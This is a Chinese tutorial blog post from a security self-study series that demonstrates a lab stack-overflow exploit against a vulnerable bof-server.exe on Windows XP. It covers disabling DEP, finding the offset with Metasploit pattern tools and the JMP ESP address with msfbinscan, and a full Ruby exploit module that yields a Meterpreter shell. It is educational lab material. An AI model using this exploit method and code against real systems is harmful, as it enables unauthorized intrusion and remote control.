您的位置：首页 > 编程语言 > ASP

[网络安全自学篇] 五十三.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell

2020-03-04 22:37 1721 查看

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了虚拟机基础知识，包括XP操作系统安装、文件共享设置、网络快照及网络设置等。这篇文章将讲解了如果搭建XP和Kali环境，并通过Windows漏洞实现栈溢出攻击，通过Metasploit反弹shell，从而Kali系统获取了XP系统的shell。该栈溢出的具体流程包括：

XP系统与Kali网络配置
实现简单栈溢出实验，使用Msfconsole进入msf控制台
任意非00的指令覆盖buffer和EBP
从程序已经加载的dll中获取他们的jmp esp指令地址
使用jmp esp的指令地址覆盖ReturnAddress
从下一行开始填充Shellcode
编写Ruby攻击脚本提权

作者作为网络安全的小白，分享一些自学基础教程给大家，主要是关于安全工具和实践操作的在线笔记，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力，点赞、评论、私聊均可，一起加油喔~

PS：本文参考了安全网站和参考文献中的文章（详见参考文献），并结合自己的经验和实践进行撰写，也推荐大家阅读参考文献。

下载地址：https://github.com/eastmountyxz/NetworkSecuritySelf-study
工具地址：https://github.com/eastmountyxz/Security-Software-Based

声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
 [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
 [渗透&攻防] 三.数据库之差异备份及Caidao利器
 [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包

一.XP系统与Kali网络配置

本实验目的是Kali系统利用Windows XP栈溢出漏洞，以Metasploit溢出bof-server.exe为例，进行攻击及shell反弹。在进行所有实验之前，需要保证虚拟机各系统之间能够相互通信，安装过程详见之前的文章。

第一步，点击“虚拟机”->“设置”。

第二步，将XP和Kali网络连接属性均勾选成“NAT模式”，然后点击确定。

第三步，配置后在kali的shell上用ifconfig命令查看主机IP。

Kali：ifconfig 192.168.44.129

第四步，在Windows的命令行中用ipconfig查看主机IP。

XP：ipconfig 192.168.44.130

同时，主机Win10系统也能够Ping通虚拟机和Kali系统。

二.简单栈溢出实验

bof-serve下载地址：https://github.com/eastmountyxz/Security-Software-Based

第一步，在主机Win10系统中设置共享文件夹，将bof-serve.exe共享给虚拟机中的XP系统。

第二步，在XP系统下载该软件至E盘，并在CMD中运行该软件。

bof-server.exe 4242
此时XP系统为服务端，开启4242端口处于监听状态。

第三步，Windows XP SP3关闭堆栈执行保护（DEP）保护。

栈溢出保护
它是一种缓冲区溢出攻击缓解手段，当函数存在缓冲区溢出攻击漏洞时，攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后，函数开始执行的时候会先往栈里插入cookie信息，当函数真正返回的时候会验证cookie信息是否合法，如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉，导致栈保护检查失败而阻止shellcode的执行。

右键“我的电脑”，点击“属性”，然后在“高级”中选择“启动和故障恢复设置”，如下图所示：

节点点击“编辑”按钮，弹出boot.ini文件。

代码如下：

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/noexecute=optin /fastdetect

我们将“noexecute=optin”修改为“noexecute=AlwaysOff”，表示关闭DEP堆栈执行保护。

第四步，在Kali系统中设置远程连接。

telnet 192.168.44.130 4242

此时远程连接成功，输入“version”可以看到XP系统中bof-server的版本信息。

同样，XP系统可以看到目标客户端Kali系统（192.168.44.129）已经连接。

第五步，用python生成1024个A，并且发送这些字符串给XP系统。

python -c "print('A'*1024)"

注意通过telnet连接XP系统，然后发送这1024个字符串。

第六步，观察XP系统，会返现bof-server.exe产生崩溃。

第七步，检查错误原因发现偏移处是41414141，这正是A的ascii码，说明发生了溢出。

三.使用Msfconsole进入msf控制台

Msfconsole提供了一个一体化的集中控制台。通过msfconsole，你可以访问和使用所有的metasploit的插件、payload、利用模块、post模块等。Msfconsole还有第三方程序的接口，比如nmap、sqlmap等，可以直接在msfconsole里面使用。在启动MSF终端之后，可以首先输入help命令列出MSF终端所支持的命令列表，包括核心命令集和后端数据库命令集。对于其中的大部分命令，你可以输入help［COMMAND］，进一步查看该命令的使用帮助信息。

第一步，输入Msfconsole打开msf。

msfconsole

第二步，输入search ms08-067查找漏洞。大家简单了解其功能，后续会写一篇文章专门分享。

search ms08-067

第三步，使用Metasploit中的pattern_create.rb脚本生成字符序列。

首先我们查看以下pattern_create.rb脚本的帮助信息，在Kali命令行输入如下信息：

root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -h
Usage: msf-pattern_create [options]
Example: msf-pattern_create -l 50 -s ABC,def,123
Ad1Ad2Ad3Ae1Ae2Ae3Af1Af2Af3Bd1Bd2Bd3Be1Be2Be3Bf1Bf

Options:
-l, --length <length>            The length of the pattern
-s, --sets <ABC,def,123>         Custom Pattern Sets
-h, --help                       Show this message

在msf控制台中输入以下命令生成字符序列。

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024

第四步，调用telnet远程连接XP系统，并将生成的内容复制发送。

第五步，确定溢出点位置。
使用pattern_create.rb产生1024个有序的字符，用同样的方式发送到XP系统，发现Offset位置为“72413372”。

此时的偏移是“72413372”，也就是说可以利用这个偏移来定位Buf的长度。任意非00的指令覆盖buffer和EBP，其结构我们再观察一遍Payload结构，如下图所示。

第六步，调用文件pattern_offset.rb计算偏移量，其offset准确字节数量为520。

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 72413372 -l 1024

这里我们用到的工具是Metasploit下的pattern_offset.rb，查看pattern_offset.rb脚本的帮助信息如下：

root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -h
Usage: msf-pattern_offset [options]
Example: msf-pattern_offset -q Aa3A
[*] Exact match at offset 9

Options:
-q, --query Aa0A                 Query to Locate
-l, --length <length>            The length of the pattern
-s, --sets <ABC,def,123>         Custom Pattern Sets
-h, --help                       Show this message

其中参数“-q”是要查询的地址，参数“-l”是要查询的字符序列的长度。我们对应的地址为72413372，生成的字符序列的长度为1024，其命令为：

msf5 > /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 72413372 -l 1024
[*] Exact match at offset 520

最终得出结果为520。

四.分析bof-serve运行加载的DLL文件

使用pattern_offset计算得到长度是第520位。接下来寻找一个jmp esp的地址，用Immunity Debugger调试工具打开bof-server查看其调用的dll文件，这里选取WS2_32.dll这个文件。

下载地址或github：http://www.immunityinc.com/products/debugger/

第一步，通过文件共享功能将Immunity Debugger软件分享给XP系统。

第二步，安装并打开Immunity Debugger软件，点击“File”->“Attach”，显示目标机上运行的所有进程。

第三步，运行XP系统的服务程序bof-server.exe，端口为4242，处于监听状态。

第四步，查看XP系统上的所有进程，找到名称为bof-server.exe的进程并查看。

第五步，选中bof-server.exe进程，单击右下角的Attach按钮。

此时，显示bof-server.exe的运行信息如下：

第六步，选择“View”->“Executable modules”菜单。

点击后的效果如下图所示：

这里，就是bof-server.exe运行加载的所有DLL文件了。这里我们选择一个ws2_32.dll文件上传到Kali的root目录下。复制的方法包括：

文件共享
百度网盘链接下载
远程服务传送

ws2_32.DLL复制到Kali的目录，如下图所示：

五.通过Metasploit查找JMP ESP指令的地址

接下来，我们需要通过工具Metasploit下的msfbinscan查找JMP ESP指令的地址。

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点，讲解MSF框架的使用。

推荐CSDN谢公子大神的文章，后面我也会学习分享一篇：
Metasploit Framework(MSF)的使用 - 谢公子

第一步，进入msf命令行，在Kali终端下输入“msfconsole”命令。

查看msfbinscan的帮助信息，如下：

msf > msfbinscan -h
[*] exec: msfbinscan -h

Usage: /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/bin/msfbinscan [mode] <options> [targets]

Modes:
-j, --jump [regA,regB,regC]      Search for jump equivalent instructions        [PE|ELF|MACHO]
-p, --poppopret                  Search for pop+pop+ret combinations            [PE|ELF|MACHO]
-r, --regex [regex]              Search for regex match                         [PE|ELF|MACHO]
-a, --analyze-address [address]  Display the code at the specified address      [PE|ELF]
-b, --analyze-offset [offset]    Display the code at the specified offset       [PE|ELF]
-f, --fingerprint                Attempt to identify the packer/compiler        [PE]
-i, --info                       Display detailed information about the image   [PE]
-R, --ripper [directory]         Rip all module resources to disk               [PE]
--context-map [directory]    Generate context-map files                     [PE]

Options:
-A, --after [bytes]              Number of bytes to show after match (-a/-b)    [PE|ELF|MACHO]
-B, --before [bytes]             Number of bytes to show before match (-a/-b)   [PE|ELF|MACHO]
-I, --image-base [address]       Specify an alternate ImageBase                 [PE|ELF|MACHO]
-D, --disasm                     Disassemble the bytes at this address          [PE|ELF]
-F, --filter-addresses [regex]   Filter addresses based on a regular expression [PE]
-h, --help                       Show this message
msf >

第二步，输入如下命令来获取JMP ESP指令的地址。

msf > msfbinscan --jump esp ./ws2_32.dll
[*] exec: msfbinscan -jump esp ./ws2_32.dll

[./ws2_32.dll]
0x71a22b53 push esp; ret
msf >

可以看到，我们得出的JMP ESP指令的地址为：0x71a22b53。

六.编写Ruby攻击脚本及反弹Shell

接着编写攻击脚本，其代码为bof_attack.rb，使用该脚本得到shell。源代码如下所示：

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' 		=> 'Stack Based Buffer Overflow Example',
'Description' 	=> %q{
Stack Based Overflow Example Application Exploitation Module
},
'Platform' 		=> 'Windows',
'Author' 		=> 'yanhan',

'Payload' 		=>
{
'space' => 1000,
'BadChars' => "\x00\xff"
},
'Targets'  		=>
[
[
'Windows XP SP3',
{'Ret' => find it, 'Offset' => find it}
]
],
'DisclosureDate' => '2019-05-25'
))
end

def exploit
connect
buf = make_nops(target['Offset'])
buf = buf + [target['Ret']].pack('V') + make_nops(20) + payload.encoded
sock.put(buf)
handler
disconnect
end
end

需要注意核心代码：

'Targets' =>
[
['Windows XP SP3',
{'Ret' => 0x71a22b53, 'Offset' => 520}
]
],

其中，Ret的值要和第五部分中找到的JMP ESP指令的地址一致，Offset的值要和第三步中找出的准确字节数一致。对应为：

‘Ret’ => 0x71a22b53
‘Offset’ => 520

第一步，将Ruby脚本上传至Kali系统。

第二步，将bof_attack.rb脚本上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/meterpreter/目录下。

下面代码是创建文件夹meterpreter，再复制Ruby脚本至该文件夹的过程，同时查看了各级目录的内容，加深读者的印象。

cd /usr/share
ls

cd metasploit-framework/modules/exploits
ls

cd windows
ls

发现不存在该文件夹之后，调用“mkdir meterpreter”创建文件夹。

mkdir meterpreter
cd meterpreter
ls

调用命令复制至该文件夹。

cp ./bof_attack.rb /usr/share/metasploit-framework/modules/exploits/windows/meterpreter/
cd /usr/share/metasploit-framework/modules/exploits/windows/meterpreter/
ls

第三步，运行攻击脚本并拿到了目标服务器的Meterpreter Shell。

启动msf控制台
msfconsole
运行ruby脚本
use exploit/windows/meterpreter/bof_attack.rb
设置目标服务器IP地址（Windows XP系统）
set RHOST 192.168.44.130
设置目标服务器端口
set RPORT 4242
查看配置信息
show options

第四步，调用exploit命令对栈溢出漏洞进行攻击。再输入ls，可以看到我们目标XP服务器的E盘内容已经被提权，这就是所谓的Windows漏洞利用。

补充谢公子大神的Exploit内容：

上面“ls”命令对应的内容即为XP系统E盘的文件，如下图所示：

需要注意，我们在执行这些操作过程中，XP系统的bof-server.exe需要一直运行，处于监听状态。某些情况可能会提示错误“Exploit completed, but no session was created”，如下图所示：

查看目标机的bof-server.exe命令行的缓冲区溢出并断开了监听。建议大家在目标机上多运行几次bof-server.exe和在Kali上多运行几次exploit，直到成功拿到Meterpreter Shell。

七.总结

文章写到这里，就介绍完毕，希望文章对您有所帮助，尤其是文章扩展的几个工具，您下来也可以详细学习。这篇文章主要讲解了如果搭建XP和Kali环境，并通过Windows漏洞实现栈溢出攻击，通过Metasploit反弹shell，从而Kali系统获取了XP系统的shell。该栈溢出的具体流程包括：

任意非00的指令覆盖buffer和EBP
从程序已经加载的dll中获取他们的jmp esp指令地址。
使用jmp esp的指令地址覆盖ReturnAddress
从下一行开始填充Shellcode

虽然是非常基础的一篇文章，但希望读者阅读并完成文章的实验。接下来作者将继续学习并分享更多的Windows漏洞利用或网络安全的文章。最后给出相关的命令。

希望这系列文章对您有所帮助，真的感觉自己技术好菜，要学的知识好多。这是第54篇原创的安全系列文章，从网络安全到系统安全，从木马病毒到后门劫持，从恶意代码到溯源分析，从渗透工具到二进制工具，还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防，人生漫漫其路远兮，作为初学者，自己真是爬着前行，感谢很多人的帮助，继续爬着，继续加油！

欢迎大家讨论，是否觉得这系列文章帮助到您！如果存在不足之处，还请海涵。任何建议都可以评论告知读者，共勉~

武汉加油！湖北加油！中国加油！！！

(By:Eastmount 2020-03-01 凌晨1点写于贵阳 http://blog.csdn.net/eastmount )

参考文献：
[1] 《软件安全》课程Windows漏洞利用实验 YH师弟
[2] NAT模式和桥接模式实现局域网其他物理机器与Vmware虚拟机互相访问 - davidhzq
[3] 解读Linux安全机制之栈溢出保护 - macwe
[4] 渗透之——使用Metasploit实现对缓冲区栈的溢出攻击 - 冰河
[5] Metasploit Framework(MSF)的使用 - 谢公子
[6] msfconsole 控制台使用和操作 - xianjie0318
[7] smb(ms17-010)远程命令执行之msf - backlion
[8] https://github.com/eastmountyxz/Security-Software-Based

点赞 6
收藏
分享
文章举报

Eastmount 博客专家发布了437 篇原创文章 · 获赞 5715 · 访问量 474万+ 他的留言板关注

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航